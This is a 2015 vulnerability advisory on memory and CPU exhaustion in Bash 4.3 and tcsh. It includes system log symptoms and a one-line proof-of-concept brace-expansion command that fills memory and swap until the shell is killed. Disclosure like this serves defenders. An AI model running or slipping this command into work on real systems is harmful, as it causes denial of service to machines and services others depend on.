Bash 4.3 uncontrolled resources exhaustion
-------------------------------------------------------------
Date: 26.04.2015
Credit: Maksymilian Arciemowicz from cxsecurity.com
Issue type: CWE-399 Resource exhaustion
-------------------------------------------------------------
=============================================================
Description:
Memory and cpu exhaustion vulnerability has been defined in extracting specially crafted string before use in bash.
=============================================================
Symptoms:
Observed memory exhaustion in kernel_task and bash process under MacOSX 10.10.3
-------------------------------------------------------------
0 kernel_task 236.0 04:17.95 170/10 0 2 9028M+ 0B 0B 0 0 running...
623 bash 15.6 02:08.22 1 0 15 3331M- 0B 31G+ 623 622 stuck...
-------------------------------------------------------------
Under freebsd,
-------------------------------------------------------------
Apr 26 12:25:43 kernel: swap_pager_getswapspace(16): failed
Apr 26 12:25:43 kernel: pid 771 (bash), uid 1001, was killed: out of swap space
-------------------------------------------------------------
and also exhaustion for tcsh
-------------------------------------------------------------
Apr 26 12:22:35 kernel: swap_pager_getswapspace(16): failed
Apr 26 12:22:35 last message repeated 3 times
Apr 26 12:22:35 kernel: pid 749 (tcsh), uid 1001, was killed: out of swap space
-------------------------------------------------------------
=============================================================
PoC:
# ls .{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}.{1,250}
=============================================================
Prevention:
If resource exhaustion occur, kill parent process or restart services such as httpd etc
=============================================================
Credit:
Flaw disclosed by Maksymilian Arciemowicz from cxsecurity and cifrex Team.
Follow our new bugtraq https://cxsecurity.com